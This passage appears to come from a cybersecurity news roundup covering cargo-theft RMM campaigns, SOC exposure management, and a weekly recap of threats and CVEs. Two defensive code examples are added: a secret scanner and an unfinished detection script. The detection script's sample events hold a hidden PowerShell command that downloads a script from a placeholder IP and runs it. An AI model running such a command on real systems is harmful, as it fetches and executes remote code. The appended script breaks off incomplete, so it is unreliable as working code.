    Users are advised to exercise caution when it comes to downloading extensions, and make sure that they are from trusted publishers. Microsoft, for its part, announced back in June that it’s instituting periodic marketplace-wide scans to protect users against malware. Every removed extension from the official marketplace can be viewed from the RemovedPackages page on GitHub.


    Source: thehackernews.com…

  • Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks

    Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks

    Nov 03, 2025 | Ravie Lakshmanan | Cybercrime / Supply Chain Attack

    Bad actors are increasingly training their sights on trucking and logistics companies with an aim to infect them with remote monitoring and management (RMM) software for financial gain and ultimately steal cargo freight.

    The threat cluster, believed to be active since at least June 2025 according to Proofpoint, is said to be collaborating with organized crime groups to break into entities in the surface transportation industry with the end goal of plundering physical goods. The most targeted commodities of the cyber-enabled heists are food and beverage products.

    “The stolen cargo most likely is sold online or shipped overseas,” researchers Ole Villadsen and Selena Larson said in a report shared with The Hacker News. “In the observed campaigns, threat actors aim to infiltrate companies and use their fraudulent access to bid on real shipments of goods to ultimately steal them.”


    The campaigns share similarities with a previous set of attacks disclosed in September 2024 that involved targeting transportation and logistics companies in North America with information stealers and remote access trojans (RATs) such as Lumma Stealer, StealC, or NetSupport RAT. However, there is no evidence to suggest that they are the work of the same threat actor.

    In the current intrusion wave detected by Proofpoint, the unknown attackers have leveraged multiple methods, including using compromised email accounts to hijack existing conversations, targeting asset-based carriers, freight brokerage firms, and integrated supply chain providers with spear-phishing emails, and posting fraudulent freight listings using hacked accounts on load boards.

    “The actor posts fraudulent freight listings using compromised accounts on load boards and then sends emails containing malicious URLs to carriers who inquire about the loads,” it said. “This tactic exploits the trust and urgency inherent in freight negotiations.”

    Needless to say, the malicious URLs embedded within the messages lead to booby-trapped MSI installers or executables that deploy legitimate RMM tools like ScreenConnect, SimpleHelp, PDQ Connect, Fleetdeck, N-able, and LogMeIn Resolve. In select instances, several of these programs are used together, with PDQ Connect being used to drop and install ScreenConnect and SimpleHelp.

    Once remote access is obtained, the attackers move to conduct system and network reconnaissance, followed by dropping credential harvesting tools such as WebBrowserPassView to capture additional credentials and burrow deeper into the corporate network.

    In at least one case, the threat actor is believed to have weaponized the access to delete existing bookings and block dispatcher notifications, and then added their own device to the dispatcher’s phone extension, booked loads under the compromised carrier’s name, and coordinated the transport.


    The use of RMM software offers several advantages. First, it obviates the need for threat actors to devise bespoke malware. Second, it allows them to fly under the radar: such tools are prevalent in enterprise environments and are typically not flagged as malicious by security solutions.

    “It’s fairly easy for threat actors to create and distribute attacker-owned remote monitoring tools, and because they are often used as legitimate pieces of software, end users might be less suspicious of installing RMMs than other remote access trojans,” Proofpoint noted back in March 2025. “Additionally, such tooling may evade anti-virus or network detection because the installers are often signed, legitimate payloads distributed maliciously.”


    Source: thehackernews.com…

  • The Evolution of SOC Operations: How Continuous Exposure Management Transforms Security Operations

    The Evolution of SOC Operations: How Continuous Exposure Management Transforms Security Operations

    Nov 03, 2025 | The Hacker News

    Security Operations Centers (SOC) today are overwhelmed. Analysts handle thousands of alerts every day, spending much time chasing false positives and adjusting detection rules reactively. SOCs often lack the environmental context and relevant threat intelligence needed to quickly verify which alerts are truly malicious. As a result, analysts spend excessive time manually triaging alerts, the majority of which are classified as benign.

    Addressing the root cause of these blind spots and alert fatigue isn’t as simple as implementing more accurate tools. Many of these traditional tools are very accurate, but their fatal flaw is a lack of context and a narrow focus – missing the forest for the trees. Meanwhile, sophisticated attackers exploit exposures invisible to traditional reactive tools, often evading detection using widely-available bypass kits.

    While all of these tools are effective in their own right, they often fail because of the reality that attackers don’t employ just one attack technique, exploit just one type of exposure or weaponize a single CVE when breaching an environment. Instead, attackers chain together multiple exposures, utilizing known CVEs where helpful, and employing evasion techniques to move laterally across an environment and accomplish their desired goals. Individually, traditional security tools may detect one or more of these exposures or IoCs, but without the context derived from a deeply integrated continuous exposure management program, it can be nearly impossible for security teams to effectively correlate otherwise seemingly disconnected signals.

    SecOps Benefits at Every Stage of the Cybersecurity Lifecycle

    Exposure management platforms can help transform SOC operations by weaving exposure intelligence directly into existing analyst workflows. Of course, having attack surface visibility and insight into interconnected exposures provides immense value, but that’s just scratching the surface. This really shouldn’t come as much of a surprise, given the significant overlap in the high-level models each team is operating, albeit often in parallel as opposed to working in tandem.

    To make the point further, I’ve included a comparison below between a typical SOC workflow and the CTEM lifecycle:

    Typical SOC Lifecycle | How Integrated Exposure Management Helps | CTEM Lifecycle

    SOC – Monitor: Maintain continuous visibility into the entire attack surface, prioritizing critical assets that matter most to the business and that attackers are most likely to go after.
    Exposure management – Shared Attack Surface Visibility: Integration with CMDB and SOC tooling creates a unified view of the attack surface and critical assets, aligning security and IT teams on what matters most.
    CTEM – Scope: Outline the scope of the exposure management program, identifying critical assets that matter most to the business, maintaining continuous visibility across the attack surface.

    SOC – Detect: Identify suspicious and malicious activity across the attack surface, ideally before access is gained or critical systems and data are compromised.
    Exposure management – Contextualize Threat Alerts: When detections fire, analysts instantly see the asset’s risk posture and whether suspicious activity aligns with known attack paths, turning generic alerts into targeted investigations.
    CTEM – Discover: Uncover exposures across the attack surface, including attack paths, vulnerabilities, misconfigurations, identity and permissions issues, etc.

    SOC – Triage: Validate security alerts and correlate event logs to identify true security incidents and malicious activity vs. benign anomalous activity.
    Exposure management – Improve Disposition Accuracy: Make better-informed decisions with asset and business context to sift through the noise of security alerts while reducing the risk of false negatives.
    CTEM – Prioritize: Prioritize discovered exposures based on threat intelligence, environment and business context to focus remediation operations on the most impactful and imminent risk.

    SOC – Investigate: Deep dive into threat intelligence, event logs and other findings to determine the blast radius, root cause, and impact of a security incident.
    Exposure management – Visualize Complex Attack Chains: Transform abstract risk findings into validated potential attack scenarios. Analysts can visualize how threat actors would chain together specific exposures, identifying critical choke points.
    CTEM – Validate: Confirm that discovered exposures are actually present, are reachable by threat actors and can actually be exploited based on patch availability and compensating controls.

    SOC – Respond: Take action to minimize breach impact and eliminate the threat within the environment.
    Exposure management – Targeted Incident Response: Understanding exploitable paths enables precise containment and remediation, addressing specific exposures quickly without disruptive over-isolation or business impact.
    CTEM – Mobilize: Drive efficient and effective remediation of exposures by driving cross-functional alignment, automating notification and ticketing workflows, and where possible, implementing security mitigations and automating patching workflows.

    This natural alignment between proactive and reactive teams’ high-level workflows makes it easy to see where the targeted threat and attack surface intelligence derived from exposure management platforms can be of use to SOC teams prior to and in the midst of a threat investigation.

    The magic really starts to happen when teams integrate their exposure management platforms with EDRs, SIEMs, and SOAR tools to deliver contextual threat intelligence precisely when and where SOC analysts need it most. This allows teams to automatically correlate discovered exposures with specific MITRE ATT&CK techniques, creating actionable threat intelligence that’s immediately relevant to each organization’s unique attack surface.

    For exposures that can’t be immediately remediated, teams can leverage this intelligence to inform detection engineering and threat hunting activities. This creates a continuous feedback loop where exposure intelligence informs detection updates, improves alert triage and investigation, and supports automated response and prioritized remediation.

    A Deeper Dive Into SOC Workflows Enriched with Exposure Intelligence

    Traditional detection tools generate alerts based on signatures and behavioral patterns, but lack environmental context. Continuous exposure management transforms this by providing real-time context about the systems, configurations, and vulnerabilities involved in each alert.

    1. When a detection fires, SOC analysts immediately understand what exposures exist on the affected system, which attack techniques are viable given the current configuration, what the potential blast radius looks like and how this alert fits into known attack paths.
    2. Alert triage becomes dramatically more efficient when analysts can instantly assess the true risk potential of each alert. Instead of triaging based on generic severity scores, exposure management provides an environment-specific risk context.
    3. During investigation, continuous exposure management provides analysts with detailed attack path analysis showing exactly how an adversary could exploit the current alert as part of a broader campaign. This includes understanding all viable attack paths based on actual network topology, access relationships, and system configurations.
    4. It also includes digging into the root cause of a breach, helping analysts determine the most likely breach points and paths an attacker would take.
    5. Response activities become more precise when guided by exposure intelligence. Instead of broad containment measures that might disrupt business operations, SOC teams can implement surgical responses that address the specific exposures being exploited.
    6. The remediation phase extends beyond immediate incident response to systematic exposure reduction, automatically generating tickets that address not just the immediate incident, but the underlying conditions that made it possible. As remediation activities are completed, the same testing processes used to uncover security gaps can be used to validate that implemented changes actually worked and risk was reduced.

    With continuous exposure management integrated into the SecOps workflow, each incident becomes a learning opportunity that strengthens future detection and response capabilities. Understanding which exposures led to successful attacks during red teaming and validation testing helps refine and implement compensating controls and/or tune detection rules to catch similar activity earlier in the attack chain.

    The Future of SOC Operations

    The future of SOC operations lies not in processing more alerts faster, but in preventing the conditions that generate unnecessary alerts while developing laser-focused capabilities against the threats that matter most. Continuous exposure management provides the environmental awareness that transforms generic security tools into precision instruments.

    In an era where threat actors are increasingly sophisticated and persistent, SOCs need every advantage they can get. The ability to proactively shape the battlefield, eliminating exposures, tuning detections, and developing custom capabilities based on environmental reality may be the difference between staying ahead of threats and constantly playing catch-up.

    Note: This article was written and contributed by Ryan Blanchard, currently a Director of Product Marketing at XM Cyber. He started his career analyzing IT and professional services markets and GTM strategies, now helping translate complex technology benefits into stories that connect innovation, business, and people.



    Source: thehackernews.com…

  • ⚡ Weekly Recap: Lazarus Hits Web3, Intel/AMD TEEs Cracked, Dark Web Leak Tool & More

    ⚡ Weekly Recap: Lazarus Hits Web3, Intel/AMD TEEs Cracked, Dark Web Leak Tool & More

    Nov 03, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

    Cyberattacks are getting smarter and harder to stop. This week, hackers used sneaky tools, tricked trusted systems, and quickly took advantage of new security problems—some just hours after being found. No system was fully safe.

    From spying and fake job scams to strong ransomware and tricky phishing, the attacks came from all sides. Even encrypted backups and secure areas were put to the test.

    Keep reading for the full list of the biggest cyber news from this week—clearly explained and easy to follow.

    ⚡ Threat of the Week

    Motex Lanscope Flaw Exploited to Drop Gokcpdoor — A suspected Chinese cyber espionage actor known as Tick has been attributed to a targeted campaign that has leveraged a recently disclosed critical security flaw in Motex Lanscope Endpoint Manager (CVE-2025-61932, CVSS score: 9.3) to infiltrate target networks and deploy a backdoor called Gokcpdoor. Sophos, which disclosed details of the activity, said it was “limited to sectors aligned with their intelligence objectives.”

    🔔 Top News

    • TEE.Fail Side-Channel Attack Extracts Secrets from Intel and AMD DDR5 Secure Enclaves — A low-cost physical side-channel attack has been found to break the confidentiality and security guarantees offered by modern Trusted Execution Environments (TEEs) from Intel and AMD, enabling full extraction of cryptographic keys and subversion of secure attestation mechanisms. The attack, codenamed TEE.fail, exploits deterministic encryption and DDR5 bus interposition to successfully bypass protections in Intel’s SGX and TDX, as well as AMD’s SEV-SNP, by eavesdropping on memory transactions using a homemade logic analyzer setup built for under $1,000. That said, the attack requires physical access to the target as well as root-level privileges for kernel driver modification.
    • Russian Hackers Target Ukraine With Stealth Tactics — Suspected Russian hackers breached Ukrainian networks this summer using ordinary administrative tools to steal data and remain undetected, researchers have found. According to a report by Broadcom-owned Symantec and Carbon Black, the attackers targeted a large Ukrainian business services company and a local government agency in two separate incidents earlier this year. What makes these attacks notable is that the hackers deployed little custom malware and instead relied heavily on living-off-the-land tactics, i.e., using legitimate software already present in the victims’ networks, to carry out their malicious actions. The targeted organizations were not named, and it remains unclear what information, if any, was stolen.
    • N. Korea Targets Web3 Sector with GhostCall and GhostHire — The North Korea-affiliated threat actor BlueNoroff, also known under aliases APT38 and TA444, has resurfaced with two new campaigns dubbed GhostCall and GhostHire, targeting executives, Web3 developers, and blockchain professionals. The campaigns rely on social engineering via platforms like Telegram and LinkedIn to send fake meeting invites and initiate multi-stage malware chains to compromise Windows, Linux, and macOS hosts. GhostCall marks a major leap in operational stealth compared to earlier BlueNoroff operations, with the attackers relying on multiple layers of staging to sidestep detection. The GhostHire operation takes a different approach, targeting Web3 developers through fake job offers and recruitment tests. BlueNoroff is a financially motivated sub-cluster of the Lazarus Group, North Korea’s state-sponsored cyber unit linked to the Reconnaissance General Bureau (RGB), and is believed to operate the long-running SnatchCrypto campaign. GhostCall and GhostHire are assessed to be the latest extensions of this campaign. The threat actor’s strategy is said to have evolved beyond cryptocurrency and browser credential theft to comprehensive data acquisition across a range of assets. “This harvested data is exploited not only against the initial target but also to facilitate subsequent attacks, enabling the actor to execute supply chain attacks and leverage established trust relationships to impact a broader range of users,” Kaspersky said.
    • New Android Banking Malware Herodotus Mimics Human Behavior — Researchers have discovered a new Android banking malware called Herodotus that evades detection by mimicking human behavior when remotely controlling infected devices. The malware is advertised by a little-known hacker who goes by the name K1R0. Herodotus works like many modern Android banking trojans. Operators distribute it through SMS messages that trick users into downloading a malicious app. Once installed, the malware waits for a targeted application to be opened and then overlays a fake screen that mimics the real banking or payment interface to steal credentials. It also intercepts incoming SMS messages to capture one-time passcodes and exploits Android’s accessibility features to read what’s displayed on the device screen. What makes Herodotus unusual, ThreatFabric said, is that it tries to “humanize” the actions attackers undertake during remote control. Instead of pasting stolen details into form fields all at once — a behavior that can easily be flagged as automated — the malware types each character separately with random pauses of about 0.3 to 3 seconds between keystrokes, imitating how a real person would type.
    • Qilin Ransomware Uses Linux Encryptors in Windows Attacks — The Qilin ransomware actors have been observed leveraging the Windows Subsystem for Linux (WSL) to launch Linux encryptors in Windows in an attempt to evade detection. Qilin, which emerged in mid-2022, has attacked more than 700 victims across 62 countries this year. The sustained rate of victims claimed on its data leak site underscores Qilin’s position as one of the most active and pernicious ransomware operations worldwide. In new attacks spotted by Trend Micro, Qilin affiliates have been seen using WinSCP to transfer the Linux ELF encryptor to compromised devices, which is then launched through the Splashtop remote management software. This is accomplished by enabling or installing WSL on the host, allowing them to natively run Linux binaries on Windows without the need for a virtual machine.

    🔥 Trending CVEs

    Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.

    This week’s list includes — CVE-2025-55315 (QNAP NetBak PC Agent), CVE-2025-10680 (OpenVPN), CVE-2025-55752, CVE-2025-55754 (Apache Tomcat), CVE-2025-52665 (Ubiquiti UniFi Access), CVE-2025-12044, CVE-2025-11621 (HashiCorp Vault), CVE-2025-43995 (Dell Storage Manager), CVE-2025-5842 (Veeder-Root TLS4B Automatic Tank Gauge System), CVE-2025-24893 (XWiki), CVE-2025-62725 (Docker Compose), CVE-2025-12080 (Google Messages for Wear OS), CVE-2025-12450 (LiteSpeed Cache plugin), CVE-2025-11705 (Anti-Malware Security and Brute-Force Firewall plugin), CVE-2025-55680 (Microsoft Cloud Files Minifilter driver), CVE-2025-6325, CVE-2025-6327 (King Addons for Elementor plugin), CVE-2025-49401 (Quiz and Survey Master plugin), CVE-2025-54603 (Claroty Secure Remote Access), and CVE-2025-10932 (Progress MOVEit Transfer).

    📰 Around the Cyber World

    • Canada Warns of Hacktivist Attacks Targeting Critical Infra — The Canadian Centre for Cyber Security has issued an alert warning of attacks mounted by hacktivists targeting internet-exposed industrial control systems (ICS). “One incident affected a water facility, tampering with water pressure values and resulting in degraded service for its community,” the Cyber Centre said. “Another involved a Canadian oil and gas company, where an Automated Tank Gauge (ATG) was manipulated, triggering false alarms. A third one involved a grain drying silo on a Canadian farm, where temperature and humidity levels were manipulated, resulting in potentially unsafe conditions if not caught on time.” Organizations are being recommended to ensure all services are properly inventoried, documented, and protected.
    • Kinsing Exploits Apache ActiveMQ Flaw — The threat actor known as Kinsing is exploiting CVE-2023-46604, a known flaw in Apache ActiveMQ, to conduct cryptojacking attacks on both Linux and Windows systems. The latest set of attacks, observed by AhnLab, is notable for the deployment of a .NET backdoor called Sharpire, along with XMRig and Stager. “Sharpire is a .NET backdoor that supports PowerShell Empire,” the South Korean cybersecurity company said. “During the process of taking control of the infected system, the threat actor uses CobaltStrike, Meterpreter, and PowerShell Empire together.” It’s worth noting that Kinsing was spotted exploiting the same flaw following its public disclosure in 2023.
    • 2 Flaws in 8 Confidential Computing Systems — Two security flaws (CVE-2025-59054 and CVE-2025-58356) have been disclosed in eight different confidential computing systems (Oasis Protocol, Phala Network, Flashbots TDX, Fortanix Salmiac, Edgeless Constellation, Edgeless Contrast, and Cosmian VM) that use Linux Unified Key Setup version 2 (LUKS2) for disk encryption. A partial mitigation has been introduced in cryptsetup version 2.8.1. “Using these vulnerabilities, a malicious actor with access to storage disks can extract all confidential data stored on that disk and can modify the contents of the disk arbitrarily,” Trail of Bits researcher Tjaden Hess said. “The vulnerabilities are caused by malleable metadata headers that allow an attacker to trick a trusted execution environment guest into encrypting secret data with a null cipher.” That said, exploitation of this issue requires write access to encrypted disks. There is no evidence that the vulnerabilities were exploited in the wild.
    • Hackers Abuse LinkedIn to Target Finance Executives — Hackers are abusing LinkedIn to target finance executives with direct-message phishing attacks that impersonate executive board invitations with an aim to steal their Microsoft credentials. The messages contain a malicious URL, clicking which triggers a redirect chain that leads victims to a fake landing page instructing them to sign in with their Microsoft account credentials to view a document. The phishing page also implements bot protection like Cloudflare Turnstile to block automated scanners. “Sending phishing lures via social media apps like LinkedIn is a great way to reach employees in a place that they expect to be contacted by people outside of their organization,” Push Security said. “By evading the traditional phishing control point altogether (email) attackers significantly reduce the risk of interception.”
    • WhatsApp Adds Support for Passkey-Encrypted Backups — WhatsApp has announced a new way to access encrypted backups with passkey support. “Passkeys will allow you to use your fingerprint, face, or screen lock code to encrypt your chat backups instead of having to memorize a password or a cumbersome 64-digit encryption key,” WhatsApp said. “Now, with just a tap or a glance, the same security that protects your personal chats and calls on WhatsApp is applied to your chat backups so they are always safe, accessible, and private.” The change is expected to be rolled out gradually over the coming weeks and months. Passkeys are a passwordless authentication method based on the FIDO industry standard. They are designed to replace passwords with cryptographic keys stored on the user’s device and secured by biometric or device-lock methods. WhatsApp launched support for passkeys on Android in October 2023 and for iOS in April 2024.
    • 12 Malicious VS Code Extensions Flagged — Cybersecurity researchers have flagged a set of 12 malicious components in the Visual Studio Code (VS Code) extension marketplace that come with capabilities to steal sensitive information or plant a backdoor that establishes a persistent connection with an attacker-controlled server address and executes arbitrary code on the user’s host. “Malware in IDE plugins is a supply chain attack channel that enterprise security teams need to take seriously,” HelixGuard said. The development comes as Aikido reported that the threat actors behind the GlassWorm campaign targeting the VS Code extension marketplace and Open VSX have moved to GitHub, employing the same Unicode steganography trick to hide their malicious payloads within JavaScript projects. The supply chain security company said the use of hidden malicious code injected with invisible Unicode Private Use Area (PUA) characters was first observed in a set of malicious npm packages back in March 2025. “These incidents highlight the need for better awareness around Unicode misuse, especially the dangers of invisible Private Use Area characters,” security researcher Ilyas Makari said. “Developers can only defend against what they can see, and right now, most tools are not showing them enough. Neither GitHub’s web interface nor VS Code displayed any sign that something was wrong.”
    • Proton Releases Data Breach Observatory — Swiss privacy-focused company Proton has released Data Breach Observatory as a way to scan the dark web for leaks of sensitive data from enterprises. It said over 306.1 million records have been leaked from 794 breaches, with retail, technology, and media emerging as the most targeted sectors. “Small- and medium-sized businesses (companies with 1–249 employees) accounted for 70.5% of the breaches reported,” the company said. “Larger companies (250–999 employees) accounted for 13.5% of data breaches, and enterprise organizations of more than 1,000+ employees accounted for the remaining 15.9%. SMBs are perfect targets for hackers, because while they might offer a smaller payday than an enterprise organization, they’re much easier to breach because they have fewer security protections in place.”
    • Russia Arrests 3 in Connection with Meduza Infostealer — Russian authorities arrested three individuals who are believed to have created and sold the Meduza infostealer. The suspects were arrested last week in the Moscow metropolitan area, according to Russia’s Interior Ministry. Authorities said they seized computer equipment, phones, and bank cards during raids on the suspects’ homes. The Ministry’s spokesperson, Irina Volk, said the malware was used in attacks against at least one government network in the Astrakhan region. In a report published last September, Russian security firm BI.ZONE said Meduza was used in multiple attacks targeting Russian organizations last year.
    • Ukrainian National Extradited to U.S. for Conti Attacks — A Ukrainian national believed to be a member of the Conti ransomware operation has been extradited to the U.S. “From in or around 2020 and continuing until about June 2022, Oleksii Oleksiyovych Lytvynenko, 43, of Cork, Ireland, conspired with others to deploy Conti ransomware to extort victims and steal their data,” the U.S. Justice Department said. “Lytvynenko controlled data stolen from numerous Conti victims and was involved in the ransom notes deployed on the victims’ systems.” Lytvynenko was arrested by Irish authorities in July 2023. He is charged with computer fraud conspiracy and wire fraud conspiracy. If convicted, he faces a maximum penalty of 5 years in prison for the computer fraud conspiracy and 20 years in prison for the wire fraud conspiracy. According to estimates, Conti was used to attack more than 1,000 victims worldwide, resulting in at least $150 million in ransom payments as of January 2022. While the group shut down the “Conti” brand in 2022, its members have split into smaller crews and moved to other ransomware or extortion operations. Four of Lytvynenko’s alleged co-conspirators, Maksim Galochkin, Maksim Rudenskiy, Mikhail Mikhailovich Tsarev and Andrey Yuryevich Zhuykov, were indicted in 2023.
    • FCC to Eliminate Cybersecurity Requirements for U.S. Telcos — The U.S. Federal Communications Commission (FCC) said it will vote next month to eliminate new cybersecurity requirements for telecommunication providers. “Following extensive FCC engagement with carriers, the item announces the substantial steps that providers have taken to strengthen their cybersecurity defenses,” Brendan Carr, chairman of the FCC, said.
    • Denmark Backs Off from E.U. Chat Control — The Danish government has formally withdrawn its Chat Control legislation after the controversial proposal failed to garner majority support among E.U. bloc members. The German government, on October 8, announced it would not support the plan. While Chat Control was presented as a way to combat the threat arising from Child Sexual Abuse Material (CSAM), critics of the proposal said it would mandate scanning of all private digital communications, including encrypted messages and photos, threatening privacy and security for all citizens in the region.
    • Poland Arrests 11 for Running Investment Scam — Polish authorities have arrested 11 suspects who ran an investment scam scheme that relied on call centers located overseas to trick Polish citizens into investing their money in bogus investment websites. The gang allegedly made more than $20 million from at least 1,500 victims.
    • 4 New RATs Use Discord for C2 — Cybersecurity researchers have shed light on four new remote access trojans (RATs) that utilize the Discord platform for command-and-control (C2): UwUdisRAT, STD RAT, Minecraft RAT, and Propionanilide RAT. “Minecraft RAT […] is operated by a threat actor group who call themselves ‘STD Group,’” ReversingLabs said. “They also operate a series of very closely related RATs that use Discord as their C2 mechanism. The RATs are so closely related that they may be the same code base, just rebranded.” Propionanilide RAT, on the other hand, features a packer called Proplock or STD Crypter to decrypt and launch the Discord RAT functionality.
    • Security Weaknesses in Tata Motors Sites — A number of security issues have been uncovered in Tata Motors’ sites such as E-Dukaan, FleetEdge, and cvtestdrive.tatamotors[.]com, including exposed Azuga API keys, two AWS keys, and an embedded “backdoor” account. Together these could have been abused to gain unauthorized access to over 70 TB of sensitive information and infrastructure across hundreds of buckets, compromise its test drive fleet management system, and gain admin access to a Tableau account managed by the conglomerate. Following responsible disclosure by security researcher Eaton Zveare in August 2023 in coordination with India’s Computer Emergency Response Team (CERT-In), the issues were eventually addressed by early January 2024. In recent months, Zveare has also demonstrated methods to break into Intel’s internal websites and identified flaws in an unnamed automaker’s centralized dealer platform that could have been abused to gain complete control over the systems of more than 1,000 car dealerships in the U.S. by creating a national admin account. The researcher also identified an API-level security defect in an unspecified platform that granted the ability to issue commands to start and stop power generators. While the problem was rectified in October 2023, the platform is no longer active.
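    Exposed keys of the kind described above usually sit in client-side JavaScript bundles or configuration endpoints that anyone can fetch, so the practical check is to scan what the site actually serves. The scanner below is an added example written for this recap, not code from the researcher or from Tata Motors. It runs a handful of regular-expression rules over a constructed sample bundle and uses Shannon entropy to separate key-shaped filler from real-looking key material. The AWS values are Amazon’s documented placeholder credentials, the telematics key and the debug account are invented, the Azuga key format is not documented on the page (it is only caught by the generic API-key rule), and the 3.0-bit entropy floor is a tunable assumption.

```python
import math
import re
from collections import Counter

# Constructed sample of a front-end bundle. The AWS values are Amazon's
# documented example credentials; the telematics key and the debug account
# are invented for illustration. None of these are real secrets.
SAMPLE_JS = """\
// app bundle excerpt (constructed sample)
const cfg = {
  region: "ap-south-1",
  accessKeyId: "AKIAIOSFODNN7EXAMPLE",
  secretAccessKey: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  telematicsApiKey: "azg_9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c",
  debugUser: "svc_backdoor", debugPass: "Summer2023!"
};
const NOT_A_KEY = "AKIA0000000000000000";  // right shape, but low entropy
"""

# (rule name, pattern with the secret in group 1, gate the finding on entropy?)
RULES = [
    ("aws_access_key_id",
     re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b"), True),
    ("aws_secret_access_key",
     re.compile(r"(?:secret|aws)[a-z_]*key[\"']?\s*[:=]\s*[\"']([A-Za-z0-9/+=]{40})[\"']", re.I), True),
    ("generic_api_key",   # assumption: covers vendor keys such as the Azuga key mentioned above
     re.compile(r"(?:api_?key|token)[\"']?\s*[:=]\s*[\"']([^\"']{20,})[\"']", re.I), True),
    ("hardcoded_password",   # a literal password is a finding regardless of its entropy
     re.compile(r"(?:pass(?:word)?|pwd)[\"']?\s*[:=]\s*[\"']([^\"']{6,})[\"']", re.I), False),
]
ENTROPY_FLOOR = 3.0   # bits per character; tunable assumption


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for a single repeated character)."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def scan(text: str):
    """Return (rule, line_number, confidence, matched_value) for every hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern, gated in RULES:
            for m in pattern.finditer(line):
                value = m.group(1)
                high = (not gated) or shannon_entropy(value) >= ENTROPY_FLOOR
                findings.append((name, lineno, "high" if high else "low", value))
    return findings


if __name__ == "__main__":
    for rule, lineno, conf, value in scan(SAMPLE_JS):
        print(f"{conf:4} line {lineno:2} {rule:22} {value}")
```

    Run it over every fetched asset (bundled JS, source maps, exposed `.env` or config JSON) rather than only the repository, because build steps frequently inline secrets that never appear in source control. Low-confidence hits are worth a glance but should not page anyone.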
    • Tangerine Turkey Uses Batch and Visual Basic Scripts to Drop Crypto Miners — A cryptocurrency mining campaign dubbed Tangerine Turkey has been found leveraging batch files and Visual Basic Scripts to gain persistence, evade defenses, and deploy XMRig miners across victim environments. Since its emergence in late 2024, the campaign is assessed to have expanded in scope, targeting organizations indiscriminately across multiple industries and geographies. “Initial access in the Tangerine Turkey malware campaign is achieved through an infected USB device,” Cybereason said. “The attack begins when the wscript.exe executes a malicious VB Script located on the removable drive. By leveraging living‑off-the‑land binaries such as wscript.exe and printui.exe, as well as registry modifications and decoy directories, the malware is able to evade traditional defenses and maintain persistence.”
    • Hezi Rash Targets Global Sites in Hacktivist Campaign — A new ideologically-motivated threat actor known as Hezi Rash (meaning Black Force) has been linked to approximately 350 distributed denial-of-service (DDoS) attacks targeting countries perceived as hostile to Kurdish or Muslim communities between August and October 2025. Founded in 2023, the Kurdish nationalist hacktivist group has described itself as a digital collective defending Kurdish society against cyber threats, per Check Point, while pushing a mix of nationalism, religion, and activism in its messaging. It’s believed that the threat actor is using tools and services from more established threat actors, such as EliteStress, a DDoS-as-a-service (DaaS) platform linked to Keymous+, KillNet, and Project DDoSia, as well as Abyssal DDoS v3. “While the technical impact of these attacks, such as temporary website outages, is evident, the broader business consequences remain unclear,” Check Point said. “The attacks appear to be of the ‘usual variety,’ focusing on disruption rather than sophisticated exploitation.” The disclosure follows a report from Radware highlighting a surge in claimed DDoS activity between October 6 and October 8, 2025, by hacktivist groups targeting Israel. Some of the key participating groups include Sylhet Gang, Keymous+, Arabian Ghosts, and NoName057(16). “On October 7 alone, more than 50 cyberattack claims against Israeli targets were recorded,” Radware said. “The weekly average number of attacks claimed spiked to almost three times the average compared to the weeks preceding October 7. This sharp escalation underscores how hacktivist campaigns continue to use symbolic anniversaries to amplify their visibility and coordinate global action.”
    • Phishing Campaigns Distribute Lampion Stealer — A Brazilian threat group has been spotted using bank transfer receipt lures carrying ZIP attachments to drop the Lampion stealer; the archives contain HTML pages that present ClickFix-style instructions to the victim. The banking trojan has been active since at least 2019. “The first change was around mid September 2024, where the TAs started using ZIP attachments instead of links to a ZIP; the second change was around mid December 2024 with the introduction of ClickFix lures as a new social engineering technique; the last change was at the end of June 2025, where persistence capabilities were added to the first stage,” Bitsight said. The command executed after the ClickFix step paves the way for three different VB Scripts that ultimately deploy the DLL stealer component of the malware.
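    The Tangerine Turkey, Lampion and Discord-C2 items above all come down to a few process-tree and DNS relationships that endpoint telemetry already records: a script host launched from a removable drive, printui.exe spawned by that script host, a Run-key write, a shell started from the Run dialog (explorer.exe as parent) with a download or script-host command line, and a non-browser process resolving Discord domains. The triage script below is an added example written for this recap, not code from Cybereason, Bitsight or ReversingLabs. The event records are constructed in a Sysmon-like JSON shape (the field names, the removable-drive list and the browser allowlist are assumptions; paths, hosts and IPs are invented, not real indicators).

```python
import re
from collections import defaultdict

# Constructed events in a Sysmon-like shape: id 1 = process create,
# 13 = registry value set, 22 = DNS query. Field names are an assumption;
# map them to your SIEM schema. Paths, hostnames and IPs are invented.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "E:\autorun\update.vbs"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\printui.exe", "cmdline": "printui.exe",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://203.0.113.10/a.vbs -o $env:TEMP\a.vbs; wscript $env:TEMP\a.vbs"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 22, "image": r"C:\Users\u\AppData\Roaming\svc\client.exe", "query": "discord.com"},
    {"id": 22, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "discord.com"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir",
     "parent": r"C:\Windows\explorer.exe"},   # benign Run-dialog usage, must not fire
]

REMOVABLE_DRIVES = {"E:", "F:"}   # assumption: fed from your USB device inventory
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
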